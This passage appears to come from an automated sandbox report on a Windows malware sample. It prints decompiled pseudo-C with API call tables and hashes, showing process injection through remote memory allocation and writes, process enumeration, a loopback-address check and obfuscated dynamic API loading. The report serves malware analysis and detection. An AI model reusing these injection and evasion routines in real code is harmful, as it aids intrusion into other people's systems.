				_t41 =  *_t72;
				_v868 = 0;
				if(_t41 != 0) {
					 *0x6f9ea4(_t41);
				}
				_t58 = 0;
				 *_t72 = 0;
				E006F4520( &_v624, 0x40);
				_t8 = _t68 + 0x12; // 0x13
				_t71 =  &_v824;
				E006ED470(_t71, _t8);
				_push(_t71);
				_t69 = _v860;
				E006F68E0(_t69, 0x80,  &_v624, _v864);
				_t47 = E006F2E70(_t69, 0,  &_v868, 0xffffffff);
				_t72 = _t72 + 0x34;
				if(_t47 == 0) {
					goto L23;
				}
				_v828 = 0;
				_v832 = 0;
				_v836 = 0;
				_v840 = 0;
				_v844 = 0;
				_v856 = 0;
				_v848 = 1;
				_v852 = 2;
				 *0x6f9ea8(_v868, 0,  &_v856, _t72);
				if(0 == 0) {
					_t52 =  *_t72;
					if(_t52 == 0) {
						goto L10;
					}
					_t54 =  *( *((intOrPtr*)(_t52 + 0x18)) + 4);
					if(_t68 == 0) {
						_t27 = _t54 - 0x200007f; // -33554559
						_t62 = _t27;
						asm("rol edx, 0x8");
						if(_t62 >= 8) {
							L19:
							if((_t54 | 0x01000000) == 0xb00007f) {
								L22:
								_t58 = 1;
								goto L23;
							}
							L20:
							_t68 = _t68 + 1;
							L11:
							_t40 = _v884;
							goto L4;
						}
						asm("bt edx, ecx");
						if(_t62 >> 0x18 < 0) {
							goto L22;
						}
						goto L19;
					}
					_t26 = _t68 - 1; // -1
					if(_t26 > 2) {
						if(_t54 != 0x600007f) {
							goto L10;
						}
						goto L22;
					}
					if(_t54 != 0x200007f) {
						goto L20;
					}
					goto L22;
				}
				L10:
				_t68 = _t68 + 1;
				if(_t68 > 4) {
					goto L23;
				}
				goto L11;
				L23:
				_t48 =  *_t72;
				if(_t48 != 0) {
					 *0x6f9ea4(_t48);
				}
				_t67 = _v864;
				goto L27;
			}

0x006e7a64
0x006e7a6a
0x006e7a73
0x006e7a77
0x006e7a7a
0x006e7a7b
0x006e7a88
0x006e7c1d
0x006e7c1d
0x006e7c23
0x006e7c26
0x006e7c2b
0x006e7c2e
0x006e7c40
0x006e7c40
0x006e7a95
0x006e7a9a
0x006e7a9d
0x006e7aa1
0x006e7bff
0x006e7bff
0x006e7c01
0x006e7c03
0x006e7c05
0x006e7c08
0x006e7c0d
0x006e7c0d
0x006e7c12
0x006e7c15
0x006e7c1a
0x006e7c1a
0x00000000
0x006e7c12
0x006e7aae
0x006e7ab5
0x00000000
0x00000000
0x006e7abb
0x006e7abf
0x006e7ac1
0x006e7ac3
0x00000000
0x006e7ac7
0x006e7ac9
0x006e7acc
0x006e7ad1
0x006e7ad1
0x006e7ad4
0x006e7ad7
0x006e7ae1
0x006e7ae4
0x006e7ae4
0x006e7aea
0x006e7aec
0x006e7af9
0x006e7b01
0x006e7b05
0x006e7b0a
0x006e7b12
0x006e7b1d
0x006e7b22
0x006e7b33
0x006e7b38
0x006e7b3d
0x00000000
0x00000000
0x006e7b47
0x006e7b4b
0x006e7b4f
0x006e7b53
0x006e7b57
0x006e7b5b
0x006e7b5f
0x006e7b67
0x006e7b7a
0x006e7b82
0x006e7b93
0x006e7b98
0x00000000
0x00000000
0x006e7b9f
0x006e7ba2
0x006e7bb5
0x006e7bb5
0x006e7bbd
0x006e7bc3
0x006e7bd2
0x006e7bdc
0x006e7be8
0x006e7bea
0x00000000
0x006e7bea
0x006e7bde
0x006e7bde
0x006e7b8a
0x006e7b8a
0x00000000
0x006e7b8a
0x006e7bcd
0x006e7bd0
0x00000000
0x00000000
0x00000000
0x006e7bd0
0x006e7ba4
0x006e7baa
0x006e7be6
0x00000000
0x00000000
0x00000000
0x006e7be6
0x006e7bb1
0x00000000
0x00000000
0x00000000
0x006e7bb3
0x006e7b84
0x006e7b84
0x006e7b88
0x00000000
0x00000000
0x00000000
0x006e7beb
0x006e7beb
0x006e7bf0
0x006e7bf3
0x006e7bf3
0x006e7bf9
0x00000000

APIs

WSAStartup.WS2_32(00000202,?), ref: 006E7A80
WSACleanup.WS2_32 ref: 006E7C2E

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

FreeAddrInfoW.WS2_32(00000000), ref: 006E7AE4
getaddrinfo.WS2_32(?,00000000,00000002), ref: 006E7B7A
FreeAddrInfoW.WS2_32(00000000), ref: 006E7BF3

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: AddrFreeHeapInfo$AllocateCleanupProcessStartupgetaddrinfo
String ID:
API String ID: 2060111366-0
Opcode ID: c3cd6484451dabdef9e2eb6863c9f6167160f131578dd95155487452b2ed9fb1
Instruction ID: 43cb9deddbb97f01eb447195c2a17a88fc66fbc647949245dbb4c7cc62affe9f
Opcode Fuzzy Hash: c3cd6484451dabdef9e2eb6863c9f6167160f131578dd95155487452b2ed9fb1
Instruction Fuzzy Hash: F951C1B190E3866FE710DF26DC45BABB6EAEF80744F14482CF449C2241E731D905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006F0090, Relevance: 7.6, APIs: 5, Instructions: 148
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E006F0090(void* __eax, intOrPtr* __ecx) {
				intOrPtr _t22;
				void* _t23;
				void* _t26;
				WCHAR** _t33;
				WCHAR** _t41;
				intOrPtr* _t49;
				void* _t59;
				WCHAR** _t60;
				WCHAR** _t61;
				WCHAR* _t78;
				void* _t79;
				intOrPtr* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				intOrPtr* _t85;
				WCHAR** _t87;
				WCHAR** _t88;

				_t80 = __ecx;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x18)) + 8)));
				_t22 = E006EC720();
				if(_t22 == 0) {
					return _t22;
				}
				 *_t85 = _t22;
				_t23 = E006E5140(0x10);
				_t87 = _t85 + 4;
				_t59 = _t23;
				E006E91B0(_t23, 4);
				 *0x6f9d54(0x6f9bbc);
				if( *_t80 == 0) {
					L6:
					_t26 = E006EC430(_t59);
					_t78 =  *_t87;
					if(_t26 == 0) {
						L11:
						 *0x6f9d9c(0x6f9bbc);
						E006E1EA0(_t59);
						L006F7400(_t59);
						_t88 =  &(_t87[1]);
						if(E006EC430( *((intOrPtr*)(_t80 + 0x10))) == 0) {
							L18:
							if(E006EC430( *((intOrPtr*)(_t80 + 0x14))) == 0) {
								L25:
								return E006E91E0(_t78);
							}
							_t81 = 0;
							do {
								_t33 = E006E42F0( *((intOrPtr*)(_t80 + 0x14)), _t81);
								_t60 = _t33;
								if(lstrcmpiW( *_t33, _t78) == 0) {
									E006E91E0( *_t60);
									_t88 =  &(_t88[1]);
									_t37 = _t60[1];
									if(_t60[1] != 0) {
										E006E91E0(_t37);
										_t88 =  &(_t88[1]);
									}
									E006ED310( *((intOrPtr*)(_t80 + 0x14)), _t81);
									_t18 = _t81 - 1; // -1
									_t81 =  !=  ? _t18 : _t81;
								}
								_t81 = _t81 + 1;
							} while (_t81 < E006EC430( *((intOrPtr*)(_t80 + 0x14))));
							goto L25;
						}
						_t82 = 0;
						do {
							_t41 = E006E42F0( *((intOrPtr*)(_t80 + 0x10)), _t82);
							_t61 = _t41;
							if(lstrcmpiW( *_t41, _t78) == 0) {
								_t44 = _t61[1];
								if(_t61[1] != 0) {
									E006E91E0(_t44);
									_t88 =  &(_t88[1]);
								}
								E006E91E0( *_t61);
								_t88 =  &(_t88[1]);
								E006ED310( *((intOrPtr*)(_t80 + 0x10)), _t82);
								_t12 = _t82 - 1; // -1
								_t82 =  !=  ? _t12 : _t82;
							}
							_t82 = _t82 + 1;
						} while (_t82 < E006EC430( *((intOrPtr*)(_t80 + 0x10))));
						goto L18;
					}
					_t83 = 0;
					do {
						_t49 = E006E42F0(_t59, _t83);
						_t50 =  *_t49;
						if( *_t49 != 0) {
							E006ED6B0(_t80, _t50, 0, _t87[7]);
						}
						_t83 = _t83 + 1;
					} while (_t83 < E006EC430(_t59));
					goto L11;
				}
				_t84 = 0;
				_t79 = 0;
				do {
					if(lstrcmpiW( *( *((intOrPtr*)( *((intOrPtr*)(_t80 + 4)) + _t84)) + 8),  *_t87) == 0) {
						E006E1200(_t59,  *((intOrPtr*)(_t80 + 4)) + _t84);
					}
					_t79 = _t79 + 1;
					_t84 = _t84 + 4;
				} while (_t79 <  *_t80);
				goto L6;
			}

0x006f0099
0x006f009b
0x006f009e
0x006f00a5
0x00000000
0x006f021c
0x006f00ab
0x006f00b0
0x006f00b5
0x006f00b8
0x006f00be
0x006f00c8
0x006f00d1
0x006f0102
0x006f0104
0x006f0109
0x006f010e
0x006f013a
0x006f013f
0x006f0147
0x006f014d
0x006f0152
0x006f015f
0x006f01b3
0x006f01bd
0x006f0211
0x00000000
0x006f0217
0x006f01bf
0x006f01c1
0x006f01c5
0x006f01ca
0x006f01d7
0x006f01db
0x006f01e0
0x006f01e3
0x006f01e8
0x006f01eb
0x006f01f0
0x006f01f0
0x006f01f7
0x006f01fc
0x006f0201
0x006f0201
0x006f0207
0x006f020d
0x00000000
0x006f01c1
0x006f0161
0x006f0163
0x006f0167
0x006f016c
0x006f0179
0x006f017b
0x006f0180
0x006f0183
0x006f0188
0x006f0188
0x006f018d
0x006f0192
0x006f0199
0x006f019e
0x006f01a3
0x006f01a3
0x006f01a9
0x006f01af
0x00000000
0x006f0163
0x006f0110
0x006f0112
0x006f0115
0x006f011a
0x006f011e
0x006f0129
0x006f0129
0x006f0130
0x006f0136
0x00000000
0x006f0112
0x006f00d3
0x006f00d5
0x006f00d7
0x006f00eb
0x006f00f5
0x006f00f5
0x006f00fa
0x006f00fb
0x006f00fe
0x00000000

APIs

RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F00C8
lstrcmpiW.KERNEL32(?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F00E3
RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F013F
lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F0171
lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000,006ECB66), ref: 006F01CF

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: lstrcmpi$CriticalSection$EnterLeave
String ID:
API String ID: 3699066220-0
Opcode ID: 082c104db46bea8e6874194044c9ef171d561a63f04bb19688a6c5ad808d88ce
Instruction ID: 9998fe833f2c9abf1e408d60621299d10eb9de84e734846dd25b63d0c4554325
Opcode Fuzzy Hash: 082c104db46bea8e6874194044c9ef171d561a63f04bb19688a6c5ad808d88ce
Instruction Fuzzy Hash: CE4192703053489FEBA0BFB6DC59A7B76EB9F80744B04042CFA4686253EE61ED05C665

Uniqueness

Uniqueness Score: -1.00%

Function 006F5320, Relevance: 7.6, APIs: 5, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E006F5320(void* __ecx, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				signed int _t40;
				void* _t41;
				void* _t42;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t63;
				intOrPtr* _t69;
				intOrPtr _t70;
				void* _t72;
				void* _t76;
				signed int* _t77;
				void* _t78;
				intOrPtr* _t79;

				_t76 = __ecx;
				E006F7C90( *((intOrPtr*)(__ecx + 0x60)),  *((intOrPtr*)(__ecx + 0x64)));
				_t79 = _t78 + 8;
				_t38 =  *(_t76 + 0x5c);
				if(_t38 != 0) {
					_t69 = _t79 + 4;
					 *_t69 = 0;
					_push(0);
					_push(0);
					_push(_t38);
					_push(_t69);
					_push(3);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x60)) + 0x3c)) + 0x28)) + _t38);
					_push(_t76);
					E006F3FA0();
					_t79 = _t79 + 0x1c;
				}
				if( *((intOrPtr*)(_t76 + 0x7c)) == 0 || E006F3DF0(_t76) != 0) {
					_t70 =  *((intOrPtr*)(_t76 + 0x60));
					_t39 =  *((intOrPtr*)(_t70 + 0x3c));
					 *_t79 = _t39;
					_t40 =  *(_t70 + _t39 + 6) & 0x0000ffff;
					if(_t40 == 0) {
						L9:
						_t57 =  *(_t76 + 0x5c);
						_t41 =  *(_t76 + 0x70);
						if(_t57 != 0) {
							VirtualFreeEx(_t41, _t57, 0, 0x8000);
							_t58 =  *(_t76 + 0x5c);
							_t41 =  *(_t76 + 0x70);
							if(_t58 != 0) {
								VirtualFreeEx(_t41, _t58,  *(_t70 +  *((intOrPtr*)(_t79 + 4)) + 0x50), 0x4000);
								_t41 =  *(_t76 + 0x70);
							}
						}
						if(_t41 != 0) {
							CloseHandle(_t41);
							 *(_t76 + 0x70) = 0;
						}
						_t42 =  *(_t76 + 0x74);
						if(_t42 != 0) {
							CloseHandle(_t42);
							 *(_t76 + 0x74) = 0;
						}
						_t72 = 1;
						 *((intOrPtr*)(_t76 + 0x80)) = 0;
						 *((intOrPtr*)(_t76 + 0x44)) = 0;
						goto L18;
					}
					_t54 = 0;
					_t77 = _t70 + ( *(_t70 +  *_t79 + 0x14) & 0x0000ffff) +  *_t79 + 0x24;
					do {
						_t63 =  *(_t76 + 0x5c) + ( *_t77 << 2);
						if(_t63 != 0) {
							VirtualFreeEx( *(_t76 + 0x70), _t63, 0, 0x8000);
							_t40 =  *(_t70 +  *_t79 + 6) & 0x0000ffff;
						}
						_t54 = _t54 + 1;
						_t77 =  &(_t77[0xa]);
					} while (_t54 < (_t40 & 0x0000ffff));
					goto L9;
				} else {
					_t72 = 0;
					L18:
					E006F7C90( *((intOrPtr*)(_t76 + 0x60)),  *((intOrPtr*)(_t76 + 0x64)));
					return _t72;
				}
			}

0x006f5327
0x006f532f
0x006f5334
0x006f5337
0x006f533c
0x006f5340
0x006f5344
0x006f5352
0x006f5353
0x006f5354
0x006f5355
0x006f5356
0x006f5358
0x006f5359
0x006f535a
0x006f535f
0x006f535f
0x006f5366
0x006f5377
0x006f537a
0x006f537d
0x006f5380
0x006f5388
0x006f53c9
0x006f53c9
0x006f53cc
0x006f53d1
0x006f53dc
0x006f53e2
0x006f53e5
0x006f53ea
0x006f53fb
0x006f5401
0x006f5401
0x006f53ea
0x006f5406
0x006f5409
0x006f540f
0x006f540f
0x006f5416
0x006f541b
0x006f541e
0x006f5424
0x006f5424
0x006f542f
0x006f5430
0x006f5436
0x00000000
0x006f5436
0x006f538d
0x006f5396
0x006f539a
0x006f53a0
0x006f53a3
0x006f53b0
0x006f53b9
0x006f53b9
0x006f53be
0x006f53c2
0x006f53c5
0x00000000
0x006f543b
0x006f543b
0x006f543d
0x006f5443
0x006f5454
0x006f5454

APIs

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,006ED839), ref: 006F53B0
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,006ED839), ref: 006F53DC
VirtualFreeEx.KERNEL32(?,?,?,00004000,?,?,?,006ED839), ref: 006F53FB
CloseHandle.KERNEL32(?), ref: 006F5409
CloseHandle.KERNEL32(?), ref: 006F541E

Part of subcall function 006F3FA0: ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 006F3FCD
Part of subcall function 006F3FA0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 006F4070
Part of subcall function 006F3FA0: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00003000,00000040), ref: 006F4095

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Virtual$Free$CloseHandleMemoryProcess$AllocReadWrite
String ID:
API String ID: 1889406058-0
Opcode ID: bfae0116a3fce751374b7469f787acdf21827a7c9118b030ff369515cb1a0e88
Instruction ID: 9a71b4c3a52593140babc6569a454c368fc86ff8f16f84927a2a4b2ccd9d53fd
Opcode Fuzzy Hash: bfae0116a3fce751374b7469f787acdf21827a7c9118b030ff369515cb1a0e88
Instruction Fuzzy Hash: D6416675600B05ABD7259F29DC89B7AB7E6FF44705F04491DEA8286790EB70F811CB60

Uniqueness

Uniqueness Score: -1.00%

Function 006F5630, Relevance: 7.6, APIs: 5, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E006F5630(void* __eax, void* __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v20;
				void* _t9;
				long _t13;
				void* _t15;
				void* _t19;
				signed int _t20;
				void* _t24;
				void* _t26;
				long _t27;
				DWORD* _t29;

				_t20 = 0;
				_v20 = 0;
				_t9 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t26 = _t9;
				if(_t9 == 0xffffffff) {
					_t24 = 0;
					goto L7;
				} else {
					_t20 = 0;
					_t13 = SetFilePointer(_t26, 0, 0, 2);
					_t27 = _t13;
					_v20 = _t13;
					SetFilePointer(_t26, 0, 0, 0);
					_t15 = E006E3180(_t27, 0);
					_t29 =  &(_t29[2]);
					_t24 = _t15;
					if(_t15 != 0 && ReadFile(_t26, _t24, _t27, _t29, 0) != 0) {
						E006F7C90(_t24, _v20);
						_push(_a12);
						_push(_a8);
						_t19 = E006F4830(_t24, _v20);
						_t29 =  &(_t29[6]);
						_t20 = 0 | _t19 != 0x00000000;
					}
					if(_t26 != 0) {
						L7:
						CloseHandle(_t26);
					} else {
					}
				}
				if(_t24 != 0) {
					E006E91E0(_t24);
					_t29 =  &(_t29[1]);
				}
				return _t20;
			}

0x006f5639
0x006f563b
0x006f564f
0x006f5655
0x006f565a
0x006f56c8
0x00000000
0x006f565c
0x006f5662
0x006f5669
0x006f566b
0x006f566d
0x006f5674
0x006f5678
0x006f567d
0x006f5680
0x006f5684
0x006f56a4
0x006f56ac
0x006f56ad
0x006f56b3
0x006f56b8
0x006f56bf
0x006f56bf
0x006f56c4
0x006f56ca
0x006f56cb
0x00000000
0x006f56c6
0x006f56c4
0x006f56d3
0x006f56d6
0x006f56db
0x006f56db
0x006f56e7

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F564F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006F5669
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F5674

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F568E
CloseHandle.KERNEL32(00000000), ref: 006F56CB

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$HeapPointer$AllocateCloseCreateHandleProcessRead
String ID:
API String ID: 2919383809-0
Opcode ID: 489c83a1c4330c2e239d559c696f30b690fc2624dfe2093c224eff41fbd99b43
Instruction ID: c8188337f71afc2ae1dc694a285ee8545137c77eabc72df3fc17278e4c334516
Opcode Fuzzy Hash: 489c83a1c4330c2e239d559c696f30b690fc2624dfe2093c224eff41fbd99b43
Instruction Fuzzy Hash: 951104B120070D7FE3212A256CC9F7B399EDF85399F15042CFB55D6261EA619D018672

Uniqueness

Uniqueness Score: -1.00%

Function 006F7BE0, Relevance: 7.6, APIs: 5, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006F7BE0(void* __eax, WCHAR* _a4, void** _a8, long* _a12) {
				void* _t7;
				long _t8;
				long _t10;
				void* _t13;
				void* _t17;
				void* _t21;
				void* _t22;
				long* _t23;
				long _t24;
				DWORD* _t25;

				_t23 = _a12;
				_t22 = 0;
				 *_t25 = 0;
				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t7 == 0xffffffff) {
					_t8 = 0;
					_t17 = 0;
				} else {
					_t21 = _t7;
					_t22 = 0;
					_t10 = SetFilePointer(_t7, 0, 0, 2);
					_t24 = _t10;
					 *_t25 = _t10;
					SetFilePointer(_t21, 0, 0, 0);
					_t17 = 1;
					if(_t24 != 0) {
						_t13 = E006E3180(_t24, 0);
						_t25 =  &(_t25[2]);
						if(_t13 == 0) {
							L5:
							_t22 = 0;
							_t17 = 0;
						} else {
							_t22 = _t13;
							if(ReadFile(_t21, _t22, _t24, _t25, 0) == 0) {
								E006E91E0(_t22);
								_t25 =  &(_t25[1]);
								 *_t25 = 0;
								goto L5;
							}
						}
					}
					_t23 = _a12;
					CloseHandle(_t21);
					_t8 =  *_t25;
				}
				 *_a8 = _t22;
				 *_t23 = _t8;
				return _t17;
			}

0x006f7be5
0x006f7bed
0x006f7bef
0x006f7c03
0x006f7c0c
0x006f7c78
0x006f7c7a
0x006f7c0e
0x006f7c14
0x006f7c16
0x006f7c1d
0x006f7c1f
0x006f7c21
0x006f7c28
0x006f7c2c
0x006f7c2f
0x006f7c34
0x006f7c39
0x006f7c3e
0x006f7c64
0x006f7c64
0x006f7c66
0x006f7c40
0x006f7c40
0x006f7c52
0x006f7c55
0x006f7c5a
0x006f7c5d
0x00000000
0x006f7c5d
0x006f7c52
0x006f7c3e
0x006f7c68
0x006f7c6d
0x006f7c73
0x006f7c73
0x006f7c80
0x006f7c82
0x006f7c8e

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F7C03
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 006F7C1D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 006F7C28
CloseHandle.KERNEL32(00000000), ref: 006F7C6D

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7C4A

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$Heap$Pointer$AllocateCloseCreateFreeHandleProcessRead
String ID:
API String ID: 1200625078-0
Opcode ID: 709288b1e0c8ca07a6255e8376963c5f63b0dbd851181e5ae832ef2fca08123c
Instruction ID: 7b7820c08cc9ac0da054f78d64f1d5195c016ae9f7555cd8aec90f312bfcd333
Opcode Fuzzy Hash: 709288b1e0c8ca07a6255e8376963c5f63b0dbd851181e5ae832ef2fca08123c
Instruction Fuzzy Hash: 7D115E712053246FD3209E669C89FBB7EEDEF467A4F11052CFA48D6280D6649905C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 006EC440, Relevance: 7.6, APIs: 5, Instructions: 67
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006EC440() {
				WCHAR* _v4;
				char _v1048;
				char _v1568;
				intOrPtr _v1596;
				void* _t14;
				struct tagPROCESSENTRY32W* _t16;
				signed int _t26;
				void* _t27;
				int _t31;
				WCHAR* _t32;
				struct tagPROCESSENTRY32W _t33;
				void* _t40;

				_t14 = CreateToolhelp32Snapshot(2, 0);
				if(_t14 == 0xffffffff) {
					_t31 = 0;
					L9:
					return _t31;
				}
				_t27 = _t14;
				_t16 = _t33;
				 *_t16 = 0x22c;
				Process32FirstW(_t27, _t16);
				_t26 = 0;
				if(_t16 == 0) {
					L6:
					CloseHandle(_t27);
					_t31 = 0;
					if(_t26 > 0) {
						_t31 = E006E3180(4 + _t26 * 4, 0);
						E006EC400(_t31,  &_v1048, _t26 * 4);
						 *((intOrPtr*)(_t31 + _t26 * 4)) = 0;
					}
					goto L9;
				}
				_t26 = 0;
				_t32 =  &_v1568;
				do {
					if(lstrcmpW(_v4, _t32) != 0) {
						goto L5;
					}
					_t40 = _t26 - 0xfd;
					 *((intOrPtr*)(_t33 + 0x22c + _t26 * 4)) = _v1596;
					_t26 = _t26 + 1;
					if(_t40 > 0) {
						goto L6;
					}
					L5:
				} while (Process32NextW(_t27, _t33) != 0);
				goto L6;
			}

0x006ec44e
0x006ec457
0x006ec4fa
0x006ec4fc
0x006ec508
0x006ec508
0x006ec45d
0x006ec45f
0x006ec461
0x006ec469
0x006ec471
0x006ec476
0x006ec4b6
0x006ec4b7
0x006ec4bf
0x006ec4c4
0x006ec4e0
0x006ec4ec
0x006ec4f4
0x006ec4f4
0x00000000
0x006ec4c4
0x006ec47e
0x006ec480
0x006ec484
0x006ec490
0x00000000
0x00000000
0x006ec496
0x006ec49c
0x006ec4a3
0x006ec4a6
0x00000000
0x00000000
0x006ec4a8
0x006ec4b2
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006EC44E
Process32FirstW.KERNEL32(00000000), ref: 006EC469
lstrcmpW.KERNEL32(?,?), ref: 006EC48C
Process32NextW.KERNEL32(00000000), ref: 006EC4AC
CloseHandle.KERNEL32(00000000), ref: 006EC4B7

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmp
String ID:
API String ID: 2964220450-0
Opcode ID: 216bc93d76a0071634eb5ffd9b423d017ea3acdb270946be24aebeed4e5e8d65
Instruction ID: e4a374bfe6f2078f1e719901b86b97cbe7698a549f446088ed144f3d4a277c3a
Opcode Fuzzy Hash: 216bc93d76a0071634eb5ffd9b423d017ea3acdb270946be24aebeed4e5e8d65
Instruction Fuzzy Hash: 6C11B971201384ABD3215F7AEC89BBF3AEFDB85764F100139F908D62A1E6259815C761

Uniqueness

Uniqueness Score: -1.00%

Function 006F18C0, Relevance: 7.6, APIs: 5, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006F18C0(signed int __ecx, void* __eflags) {
				char _v524;
				struct HINSTANCE__* _t7;
				signed int _t8;
				signed int _t20;
				CHAR* _t22;
				WCHAR* _t23;
				struct HINSTANCE__* _t24;
				void* _t25;
				CHAR* _t26;

				_t20 = __ecx;
				_t23 =  &_v524;
				E006F4520(_t23, 0x41);
				_t26 = _t25 + 8;
				_t7 = LoadLibraryW(_t23);
				_t24 = _t7;
				if(_t7 == 0) {
					_t8 =  *0x6f9c00; // 0x73e71f81
				} else {
					_t22 = _t26;
					E006F7160(_t22, 0x42);
					 *0x6f9c4c = GetProcAddress(_t24, _t22);
					E006F7160(_t22, 0x43);
					 *0x6f9be8 = GetProcAddress(_t24, _t22);
					E006F7160(_t22, 0x44);
					 *0x6f9b80 = GetProcAddress(_t24, _t22);
					E006F7160(_t22, 0x45);
					_t8 = GetProcAddress(_t24, _t22);
					 *0x6f9c00 = _t8;
				}
				return (_t8 & 0xffffff00 | _t8 != 0x00000000) & (_t20 & 0xffffff00 | _t24 != 0x00000000) & 0x000000ff;
			}

0x006f18c0
0x006f18c9
0x006f18d3
0x006f18d8
0x006f18dc
0x006f18e2
0x006f18e6
0x006f1942
0x006f18e8
0x006f18e8
0x006f18ed
0x006f18ff
0x006f1907
0x006f1913
0x006f191b
0x006f1927
0x006f192f
0x006f1939
0x006f193b
0x006f193b
0x006f195f

APIs

LoadLibraryW.KERNEL32(?), ref: 006F18DC
GetProcAddress.KERNEL32(00000000), ref: 006F18FD
GetProcAddress.KERNEL32(00000000), ref: 006F1911
GetProcAddress.KERNEL32(00000000), ref: 006F1925
GetProcAddress.KERNEL32(00000000), ref: 006F1939

Memory Dump Source

